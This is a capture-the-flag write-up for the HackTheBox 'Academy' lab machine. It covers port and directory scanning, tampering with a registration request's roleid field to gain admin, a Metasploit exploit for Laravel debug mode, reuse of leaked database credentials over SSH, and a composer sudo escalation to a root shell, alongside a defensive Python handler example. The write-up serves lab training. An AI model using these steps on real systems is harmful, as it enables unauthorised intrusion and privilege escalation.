HTB Academy

Writeup for Academy box on HackTheBox.eu

Initial enumeration

Initial port scan

sudo nmap -sC -sV -vv -oA tcp 10.129.80.186 && sudo nmap -sC -sV -vv -oA allports -p- 10.129.80.186

[Screenshot: Nmap scan output]

When we browse to the IP we get redirected to academy.htb so let's add that to our hosts file.

Once there we are presented with a login / register link.

Creating an account with test/test allows us to login and see a panel of data.

Proxying our traffic through Burp shows that the application contacts a /api/modules path, which looks interesting.

[Screenshot: Burp traffic proxy]

The API paths return 404, so we move on.

Running ffuf on the main application

ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://academy.htb/FUZZ -c -e .php,.txt,.zip

[Screenshot: ffuf output]

Checking the original register request, we notice that we are sending roleid=0. Let's change the role to 1 and see what happens:

uid=test1&password=test&confirm=test&roleid=1

After we create a new account this way and log in to the admin.php page, we get some more information:

[Screenshot: admin page]
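The role tampering above works because the registration handler stores whatever fields the client sends. As an added example (not code from the original writeup or the box), here is a minimal Python model of that handler beside a hardened version that allow-lists the accepted fields and assigns the role server-side, using the request body from the writeup as constructed sample input:

```python
from urllib.parse import parse_qs

# Constructed sample: the register request body from the writeup, with the
# client-supplied roleid bumped from 0 to 1.
SAMPLE_BODY = "uid=test1&password=test&confirm=test&roleid=1"

ROLE_USER, ROLE_ADMIN = 0, 1
# Fields a self-service registration is allowed to set; roleid is deliberately absent.
ALLOWED_FIELDS = {"uid", "password", "confirm"}


def parse_body(body: str) -> dict:
    """Flatten an application/x-www-form-urlencoded body to single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def register_vulnerable(body: str) -> dict:
    """Mass-assigns every submitted field, so the client picks its own role."""
    form = parse_body(body)
    return {"uid": form["uid"], "roleid": int(form.get("roleid", ROLE_USER))}


def register_hardened(body: str) -> dict:
    """Copies only allow-listed fields and sets the role server-side."""
    form = parse_body(body)
    if form.get("password") != form.get("confirm"):
        raise ValueError("password confirmation mismatch")
    user = {k: v for k, v in form.items() if k in ALLOWED_FIELDS}
    # Every self-registered account starts as a normal user, whatever was sent.
    return {"uid": user["uid"], "roleid": ROLE_USER}


def tampered_fields(body: str) -> set:
    """Submitted fields outside the allow list; worth logging as a tampering signal."""
    return set(parse_body(body)) - ALLOWED_FIELDS


if __name__ == "__main__":
    print("vulnerable:", register_vulnerable(SAMPLE_BODY))
    print("hardened:  ", register_hardened(SAMPLE_BODY))
    print("unexpected fields:", tampered_fields(SAMPLE_BODY))
```

The vulnerable handler yields roleid=1 for the sample body, the hardened one yields roleid=0 and reports roleid as an unexpected field.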

We discover a new subdomain, so we add it to our hosts file:

dev-staging-01.academy.htb

While accessing the website on this subdomain we discover it is a Laravel framework application. It shows an error page with a stack trace, which tells us it is also running in debug mode.

[Screenshot: Laravel debug page]

Trying to connect to MySQL on port 33060 fails without an error.

Initial foothold

There is a Metasploit exploit for Laravel in debug mode.

[Screenshot: Metasploit usage]

Browsing to the /var/www/html/academy folder we discover that this is also a Laravel app, and we find a set of MySQL credentials in its configuration:

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

Using the MySQL password, we try to log in over SSH as each of the users found in /home/:

21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3n

We get a hit.

[Screenshot: Hydra SSH brute force]

User enumeration

Our user is in the adm group and has permission to read some log files, so let's see what we can find.

We can read auth and audit logs.

Let's run linpeas to see if it can find something interesting for us: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

And we get something interesting:

[Screenshot: LinPEAS output]

Credentials: mrb3n / [email protected]!

After SSH-ing in as mrb3n and running sudo -l, we see that we can execute composer with sudo.

[Screenshot: sudo -l output for mrb3n]

Privilege escalation

Looking at https://gtfobins.github.io/gtfobins/composer/#sudo, we can execute a shell command while running composer:

# Create a temporary working directory for composer
TF=$(mktemp -d)
# Define a composer script named "x" that spawns an interactive shell
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
# Run that script through the sudo-allowed composer binary
sudo composer --working-dir=$TF run-script x

[Screenshot: privilege escalation to root]